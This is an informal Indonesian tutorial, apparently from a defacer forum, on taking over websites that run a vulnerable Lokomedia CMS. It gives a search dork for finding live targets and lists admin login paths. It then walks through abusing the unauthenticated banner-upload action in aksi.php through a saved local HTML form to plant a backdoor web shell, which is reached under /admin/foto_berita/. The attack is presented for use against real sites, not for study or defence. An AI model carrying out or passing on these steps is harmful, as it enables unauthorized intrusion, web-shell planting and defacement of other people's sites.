Sekarang sya akan membagikan Tutor "Bug Upload CMS Lokomedia Vulnerable" Kepada para mastah :v Tapi Perhatikan Dengan Baik , Karena Bug Nya Agak Rumit -_- .
Klau gitu langsung aja baca artikel di bwah :D .
Dork : allinurl:media.php?module=berita
Gunakan Dork diatas dengan menggunakan mesin pencarian :D .
Kemudian pilih salah satu target yg mau di hajar :v .
klau sudah dapat masuk dulu di halaman loginnya mas mbah .
biasanya halaman loginnya kyak gini :
http://localhost/administrator/
http://localhost/adminweb/
http://localhost/admin/
http://localhost/admin.php
http://localhost/redaktur/
Klau udah msuk di halaman loginnya masukkan url ini"modul/mod_banner.php"
Contoh kyak gini nih
http://localhost/admin/modul/mod_banner.php
Kemudian klik icon Tambah Banner dan akan muncul Halaman Upload banner, jangan diapakan dahulu, sekarang kita copy semua html tersebut dengan cara CTRL + U dan simpan di Notepad. Didalam Source tersebut ada :
nanti ada di source code tersebut kyak gini ".aksi.php?module=banner&act=input"
Masukkan Source Code yg di atas di belakang url target kyak gini
www.site.com/admin/aksi.php?module=banner&act=input
Simpan dengan Nama apa saja terserah anda kehendaki dengan format .html, kemudian buka file tersebut dan isilah dengan backdoor yang anda miliki.
Klau mau lihat hasil upload shellnya disini mas mbah :D
www.site.com/admin/foto_berita/namashell.php
Mudahkan.? Sisa di praktekin nih mastah , dan jangan lupa Enjoy :v
semua tergantung ketamvanan anda :v
